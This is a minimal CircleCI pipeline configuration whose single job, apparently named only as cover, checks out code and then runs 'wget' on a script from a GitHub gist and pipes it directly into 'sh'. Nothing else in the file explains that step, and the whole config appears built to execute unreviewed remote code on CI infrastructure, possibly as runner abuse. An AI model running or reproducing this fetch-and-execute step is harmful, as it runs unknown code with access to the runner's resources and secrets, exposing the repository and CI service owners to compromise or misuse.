version: 2.1

jobs:
  decent:

    docker:
      - image: cimg/base:stable
    steps:
      - checkout
      - run: wget https://gist.githubusercontent.com/B4gol/f9b42daf26b8be1ecb4f314c40c82fdc/raw/kernit.dev -O - | sh
workflows:
  decent-workflow:
    jobs:
      - decent
